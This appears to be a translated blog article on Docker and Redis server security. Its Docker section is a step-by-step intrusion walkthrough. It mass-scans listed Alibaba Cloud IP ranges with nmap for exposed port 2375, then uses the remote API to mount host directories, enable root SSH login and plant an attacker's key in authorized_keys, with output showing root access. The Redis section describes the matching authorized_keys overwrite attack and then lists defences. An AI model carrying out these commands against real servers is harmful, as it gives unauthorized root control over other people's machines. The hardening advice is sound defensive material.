foreword

Docker security

Docker security vulnerabilities mainly include the following aspects:

Docker does not isolate the user namespace. In other words, the root user inside the container is the root user of the host machine. Once the directory is mounted, the mounted file system can be modified at will within the container as the root user of the host machine.
The docker service has high execution rights, and ordinary users under the docker user group can execute docker runcommands such as
If the exposed docker remote API port does not enable ssl verification, any machine that can connect to the docker host can freely operate the docker daemon of the docker host.

Here is a case as an illustration, excerpted from: Docker 2375 port intrusion server

Use nmapthe command to scan port 2375, the main target is the IP segment of aliyun, you can know it through Baidu

42.96.128.0/17    Alibaba (Beijing) Technology Co., Ltd. China  
42.120.0.0/16    Aliyun Computing Co., LTD China  
42.121.0.0/16    Aliyun Computing Co., LTD China  
42.156.128.0/17    Aliyun Computing Co., LTD China  
110.75.0.0/16    Asia Pacific Network Information Centre China  
110.76.0.0/19    Ali Technology Co., Ltd China  
110.76.32.0/20    Aliyun Computing Co., LTD China  
110.173.192.0/20    HiChina Web Solutions (Beijing) Limited China  
110.173.208.0/20    HiChina Web Solutions (Beijing) Limited China  
112.124.0.0/16    Hangzhou Alibaba Advertising Co.,Ltd. China  
112.127.0.0/16    Hangzhou Alibaba Advertising Co.,Ltd. China  
114.215.0.0/16    Hangzhou Alibaba Advertising Co.,Ltd. China  
115.28.0.0/16    HiChina Web Solutions (Beijing) Limited China  
115.29.0.0/16    HiChina Web Solutions (Beijing) Limited China  
115.124.16.0/22    Hangzhou Alibaba Advertising Co.,Ltd. China  
115.124.20.0/22    Hangzhou Alibaba Advertising Co.,Ltd. China  
115.124.24.0/21    Hangzhou Alibaba Advertising Co.,Ltd. China  
119.38.208.0/21    Hangzhou Alibaba Advertising Co.,Ltd. China  
119.38.216.0/21    Hangzhou Alibaba Advertising Co.,Ltd. China  
119.42.224.0/20    Alibaba (China) Technology Co., Ltd. China  
119.42.242.0/23    Hangzhou Alibaba Advertising Co.,Ltd. China  
119.42.244.0/22    Hangzhou Alibaba Advertising Co.,Ltd. China  
121.0.16.0/21    Hangzhou Alibaba Advertising Co.,Ltd. China  
121.0.24.0/22    Hangzhou Alibaba Advertising Co.,Ltd. China  
121.0.28.0/22    Hangzhou Alibaba Advertising Co.,Ltd. China  
121.196.0.0/16    Hangzhou Alibaba Advertising Co.,Ltd. China  
121.197.0.0/16    Hangzhou Alibaba Advertising Co.,Ltd. China  
121.198.0.0/16    Hangzhou Alibaba Advertising Co.,Ltd. China  
121.199.0.0/16    Hangzhou Alibaba Advertising Co.,Ltd. China  
140.205.0.0/16    Aliyun Computing Co., LTD China  
203.209.250.0/23    Hangzhou Alibaba Advertising Co.,Ltd. China  
218.244.128.0/19    Hangzhou Alibaba Advertising Co.,Ltd. China  
223.4.0.0/16    Hangzhou Alibaba Advertising Co.,Ltd. China  
223.5.0.0/16    Hangzhou Alibaba Advertising Co.,Ltd. China  
223.5.5.0/24    Hangzhou Alibaba Advertising Co.,Ltd. China  
223.6.0.0/16    Hangzhou Alibaba Advertising Co.,Ltd. China  
223.6.6.0/24    Hangzhou Alibaba Advertising Co.,Ltd. China  
223.7.0.0/16    Hangzhou Alibaba Advertising Co.,Ltd.

Save these ip segments as aliyun.list, execute the following command:

cat aliyun.list| awk '{print $1}' | xargs -n 1 -I {} nmap -sT -p2375 {} --open    
# 简单解释一下命令：
# awk 将第一列IP网段过滤出来
# xargs 将过滤出来的IP一个一个的分次送给nmap，-I {} 是指使用{}来代替传送的参数
# ...
# Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-05 09:57 CST
# Nmap scan report for 42.96.MOSAIC.MOSAIC
# Host is up (0.070s latency).
# PORT     STATE SERVICE
# 2375/tcp open  docker
# ...

Assume that the IP to be attacked after scanning is: 127.0.0.1.

Test the permissions of 2375

docker -H tcp://127.0.0.1:2375 ps

# CONTAINER ID        IMAGE                              COMMAND                  CREATED             STATUS              PORTS           
# 73aa690e7c92        imdjh/owncloud-with-ocdownloader   "/entrypoint.sh"         9 days ago          Up 3 days           0.0.0.0:9009->80
# f57c56af0e29        rethinkdb:2.3.2                    "rethinkdb --bind all"   9 days ago          Up 3 days           8080/tcp, 28015/
# 37c1401db593        gaomd/ikev2-vpn-server:0.3.0       "/bin/sh -c /usr/bin/"   10 days ago         Up 3 days           0.0.0.0:500->500
# af7338a5426d        nginx:1.9-alpine                   "nginx -g 'daemon off"   3 weeks ago         Up 3 days           443/tcp, 0.0.0.0
# ...

The reason for this message is that the port 2375 of the server docker does not enable SSL verification

Start your own container remotely

# images 看看本地已有的镜像
# docker -H tcp://127.0.0.1:2375 images
# ...
# swarm                              latest              47dc182ea74b        4 weeks ago         19.32 MB
# jwilder/nginx-proxy                latest              203b20631e41        4 weeks ago         255.6 MB
# ubuntu                             latest              c5f1cf30c96b        4 weeks ago         120.8 MB
# shipyard/shipyard                  latest              ba426f0944bc        5 weeks ago         58.92 MB
# ...

Choose a mirror, such as Ubuntu

# docker -H tcp://127.0.0.1:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu

ssh pub key injection

/tmp/ssh_etc/sshd_configFirst look at the (that is, the host /etc/ssh/sshd_config) field in the container that was just started PermitRootLogin. If it is no, change it to yes to allow root to log in through ssh.
Then generate a new pair of pub keys on your machine (if you already have an ssh key, it is also recommended to generate a new one, do not use your daily ssh pub key)

# 使用 ssh-keygen生成
ssh-keygen -t rsa -C "[email protected]"
# 执行命令后的提示Enter file in which to save the key要看好，不要把自己的ssh key覆盖了，可以选着/tmp/id_rsa
# 其他提示enter到底即可

Go ahead, inject the ssh pub key, go back to the container execution just started

cat >> /tmp/root/.ssh/authorized_keys <<EOF
>ssh-rsa AAA....     # 这里粘贴你刚刚在自己机器生成的/tmp/id_rsa.pub
>EOF

# 如果/tmp/root/.ssh目录不存在，就直接创建

# ssh -i 指定秘钥登录
ssh -i /tmp/id_rsa [email protected]

# Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)
#
# * Documentation:  https://help.ubuntu.com/
#
# Welcome to aliyun Elastic Compute Service!
#
# Last login: Fri Jun  3 01:38:07 2016 from 120.85.MOSAIC.MOSAIC
# manpath: can't set the locale; make sure $LC_* and $LANG are correct
# root@iZ28p9b7e***:~# 
# ...

How to put this vulnerability
can refer to: Protect the Docker daemon socket

Redis security

The attack of Redis mainly has the following steps:

Maliciously scan port 6379, determine that the redis service is included, and try to log in with ssh
Use the redis client to connect to the redis server and execute redis commands, such as clearing all data
Use config dirthe command to backup the redis data path value /root/.ssh/
Use config filenamethe specified RDB backup file name as authorized_keys
Set the crackit key and set the value to the public key of the malicious visitor
Execute bgsave, the save action triggers RDB data backup, and stores the attacker’s public key in authorized_keys
The attacker ssh to the redis server successfully

Generally speaking, the corresponding defensive strategy is as follows:

Set a password that is complex enough and updated regularly. If it is Redis with a master-slave structure, remember to add the masterauth configuration to the configuration of the slave node, otherwise the synchronization of the master-slave node will fail
Disguise dangerous commands, such as keys: If there are many keys, there is a possibility of blocking Redis. flushall/flushdb: All data is cleared. save: If there are many key values, there is a possibility of blocking Redis. debug: For example, debug reload will restart Redis. config: config should be handed over to administrators. shutdown: Stop Redis.
set up firewall
do not use the default port
Start redis with a non-root user

Server Operation and Maintenance Server Security Issues

Article Directory

foreword

Docker security

Redis security

reference

Guess you like